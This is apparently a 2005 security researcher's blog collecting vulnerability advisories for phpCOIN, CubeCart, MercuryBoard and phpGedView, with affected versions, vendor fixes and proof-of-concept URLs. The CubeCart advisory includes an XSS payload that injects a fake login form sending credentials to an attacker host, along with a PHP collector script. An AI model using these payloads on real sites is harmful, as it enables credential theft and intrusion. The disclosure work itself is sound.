phpcoin phpinfo information disclosure

Monday, February 28, 2005
#######################################
phpcoin phpinfo information disclosure
vendor url:http://www.phpcoin.com/
vendor notified : yes exploit avaible:yes
advisore:http://lostmon.blogspot.com
/2005/03/phpcoin-phpinfo-information-disclosure.html
OSVDB ID:14257
#######################################

phpCOIN Is a free software package originally designed for web-hosting resellers to handle clients, orders,invoices,
notes and helpdesk,but no longer limited to hosting resellers.

In a default instalation phpcoin have a file called 'phpinfo.php'
any remote user can call this file and obtain relevant information
about configuration and the server.



versions afected :

1.2.0
1.2.1b
1.2.1

exploit:

http://[target]phpcoin_directory/phpinfo.php

solution :

For phpinfo: after phpcoin isntalation´s delete this file :)

atentamente:
Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to all who belibed in me

--
La curiosidad es lo que hace mover la mente...

CubeCart 2.0.x multiple variable XSS attacks and path disclosure

Friday, February 25, 2005
########################################################
CubeCart 2.0.x multiple variable XSS and path disclosure
vendor: Devellion Limited
vendor url:http://www.cubecart.com
vendorconfirmed :yes exploit avaible: yes
advisore:http://lostmon.blogspot.com/2005/02/
cubecart-20x-multiple-variable-xss.html
vendor solution:http://www.cubecart.com/site/forums/
index.php?showtopic=6032
Related OSVDB iD: 14062 13810 More relatedOSVDB
Secunia:SA14416
Securitytracker:1013304
#########################################################


CubeCart contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate some variables upon submission to some scripts.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server,leading to a loss of integrity.
The 'admin/Settings.inc.php' script is include in all these archives and is this one that fails when validate code was send to the other archives accross of the variables.



##################
variables afected:
##################

cat_id
PHPSESSID
view_doc
product
session
catname
search
page

###########################
posible files XSS afected:
###########################

forgot_pass.php
index.php
login.php
logout.php
new_pass.php
register.php
sale_cat.php
search.php
tellafriend.php
view_doc.php
view_order.php
view_product.php
your_links.php
your_orders.php

##############################
path disclosure Files afected:
##############################

PoC = http://[Target]/path_to_store/cat_navi.php

information.php
language.php
list_docs.php
popular_prod.php
sale.php
subfooter.inc.php
subheader.inc.php
cat_navi.php

###################
versions afected :
###################

2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6 Not affected.


#####################################################
Some proof of comcept ,but have moooore !!!! :/
#####################################################

http://[Target]/path_to_store/?"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?cat_id=1"><script>alert
(document.cookie);</script>

http://[Target]/path_to_store/forgot_pass.php?catname='pruebas1'"><
script>alert(document.cookie);</script>

http://[Target]/path_to_store/index.php?cat_id=5"><body><p>
<h1>CubeCart XSS Pow@ !!!</h1></p>/<body>

http://[Target]/path_to_store/view_order.php?session=1"><script>
alert(document.cookie);</script>

http://[Target]/path_to_store/view_order.php?product=1"><script>alert
(document.cookie);</script>

http://[Target]/path_to_store/your_orders.php?cat_id="><script>
document.write(document.cookie)</script>

http://[Target]/path_to_store/view_product.php?product=1"><script>
alert(document.cookie);</script>

http://[Target]/path_to_store/tellafriend.php?product=1&session="><
script>alert(document.cookie)</script>

http://[Target]/path_to_store/tellafriend.php?product=1"><script>
document.write(document.cookie)</script>

http://[Target]/path_to_store/login.php?session="><script>alert
(document.cookie);</script>




http://[Target]/path_to_store/search.php?search=%22%3E%3Cform%
20action=http://[Attacker]/savedb.php%20method=post%3EUsername:
%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:
%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%
20name=Login%20type=submit%20value=Login%3E%3C/form>




http://[Target]/path_to_store/tellafriend.php?product=1%22%3E%
3Cform%20action=http://[Attacker]/savedb.php%20method=post%3E
Username:%3Cinput%20name=username%20type=text%20maxlength=30%3
EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3
E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form%3E



###########################
foof of concept savedb.php
###########################

<?
$lala = fopen("tostada.txt","a+");
fwrite($lala,"username:".$username."|"."Password:".$password."|");
fclose($lala);
header("Location:http://[target]/path_to_store/login.php");
exit();
?>

#############################

Change the variable for other vulnerable or for other file & variable
so many are vulnerables :P

solution :

1- upgrade to version 2.0.6

1.1- for fixing path disclusure issue ,the Vendor release a fix at
2005-02-21.Cubecart 2.0.6 is not afected ,upgrade your store or aply the fix.

1.2- For fixing most XSS flaws You need to update your store to 2.0.6 and wait for all changes or manual aply the fix.


#################
release time :
#################


discovered : 2005-02-15
vendor notify: 2005-02-15
vendor respose: 2005-02-15
path disclose.fix: 2005-02-21
XSS fix: 2005-02-25
disclosure date: 2005-02-25



atentamente

Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to www.hispanew.com for support
Thnx to cubecart Team ,Good Respose & Good work !!
Thnx To http://www.osvdb.org

blog: http://lostmon.blogspot.com/


--
La curiosidad es lo que hace mover la mente...

Mercuryboard forum.php f variable XSS

Wednesday, February 16, 2005
################################################
Mercuryboard 1.0.x & 1.1.x forum.php f variable XSS
vendor url: http://www.mercuryboard.com
advisore:http://lostmon.blogspot.com/2005/02/
mercuryboard-forumphp-f-variable-xss.html
exploit avaible :yes vendor: emailed
OSVDB ID 13764
Secunia:SA13937
Securitytracker:1013223
################################################


MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services

Mercuryboard contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'f' variable upon submission to the 'forun.php' script.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

afected versions :

1.0.x
1.1.x


Proof of concept

http://[victim]/index.php?a=forum&f='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://[victim]/index.php?a=forum&f='><script>alert
(document.cookie)</script>

impact:

Loss of confidenciality
Information disclosure
path disclosure
imput manipulation.

solution:

Currently, there are no known upgrades, patches, or workarounds available to correct this

issue.


release time :

discovered : 2005-02-13
Email to vendor: 2005-02-13
disclosure date: 2005-02-16

Atentamente:

Lostmon (lostmon@gmail.com)

Thnx to estrella Ke tailoviu un monton :P
thnx to all for the support.

http://Lostmon.blogsport.com/

--
La curiosidad es lo que hace mover la mente....

Mercuryboard debug information disclosure

Monday, February 14, 2005
################################################
Mercuryboard 1.0.x & 1.1.x debug information disclosure
vendor url: http://www.mercuryboard.com
advisore:http://lostmon.blogspot.com/2005/02/
mercuryboard-debug-information.html
OSVDB ID:13787
exploit avaible :yes vendor: emailed
Secunia:SA14284
Securitytracker:1013626
################################################


MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services


Mercuryboard contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a any user manipulates the imputs in the url and added \&debug=1 at url or concatenate &debug=1, occurs, which will disclose all sql querys ,all files are in use ,path disclosure, and what templates used this information resulting in a loss of confidentiality.

afected versions :

1.0.x
1.1.x
1.1.3 not afected

Proof of concept

http://[target]/index.php?a=forum&f=\&debug=1
http://[target]/index.php?a=\&debug=1
http://[target]/index.php?a=&debug=1
http://[target]/index.php?a=forum&debug=1
http://[target]/index.php?c=&debug=1

impact:

Loss of confidenciality
Information disclosure
path disclosure
imput manipulation.

solution:

need to update tu version 1.1.3 this issue is solved in this version

release time :

Discovered : 2005-02-13
Email to vendor: 2005-02-13
disclosure date: 2005-02-14
updated : 2005-04-02
Atentamente:

Lostmon (lostmon@gmail.com)

Thnx to estrella Ke tailoviu un monton :P
thnx to http://www.hispanew.com for support.
http://Lostmon.blogsport.com/
--
La curiosidad es lo que hace mover la mente....

Multiple full path disclosure in phpGedview 3.2 and prior

Tuesday, February 01, 2005
Multiple full path disclosure in phpGedview 3.2 and prior:

PhpGedview is a web based tree for indexing and ordening all geanologic entries.
a user can look and present the information by diferens querys.

This aplication have various imput validations errors
and reveal some data to remote users.

#######################################################
variable 'level' and 'parent[0]'in file 'placelist.php'
#######################################################

if we change the value of the variable 'level' to other was not exit...

http://[target]/phpGedView/placelist.php?level=01
http://[target]/phpGedView/placelist.php?level=4000000000
(number of error lines show)

if we change the value of the array on variable 'parent[0]' to a non
existen array value...or a letter

http://[target]/phpGedView/placelist.php?action=show&level=1
&parent[1]=Click+edit+and+change+me

http://[target]/phpGedView/placelist.php?action=show
&parent[x]=Misnaged&level=0

http://dismarking.freefronthost.com/phpGedView/placelist.php?
action=find&level=1&parent[x]=Click+edit+and+change+me

here if we change the variable 'level' obtain the error again

http://[target]/phpGedView/placelist.php?action=show&parent[x]=
Misnaged&level=4000 (level=4000 number of error lines show)

we can make some convinations...

###########################################################
variable 'pids[0]' in file timeline.php
###########################################################

if we change the value of the array 'pids[0] to a non existant number
or a letter we found again the error.

http://[target]/phpGedView/timeline.php?pids[x]=I2222


###########################################################
variable not defined in file 'help_text.php'
###########################################################

in this file for make an error we need only a invent a variable
(in the example 'lala')

http://[target]/bin/phpgedview/help_text.php?lala=lala

we get aganin full path disclosure.


############################################################
variable 'filename' in 'imageview.php'
############################################################

variable filename is not validate porperly and permits inport
files to other sites.

http://[target]/imageview.php?filename=http://[remote]/logo.gif

and we can obtain again a full path instalation

http://[target]/imageview.php?filename=../ or some invalid data.



############################################################
change name of lenguage by a number causes a sesion crachses
############################################################

wen we change to another language , in the finish of the url we
have the word of language use.
If we change this value for a numbres we crachs the session,
and full path reveal.

http://[target]/phpGedView/individual.php?pid=I1&ged=pruebas2.ged
&changelanguage=yes&NEWLANGUAGE=1


############################################################


atentamente
Lostmon (lostmon@gmail.com)
thnx to estrella to be my light
thnx to all one that believes in my

La curiosidad es lo que hace mover la mente...
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...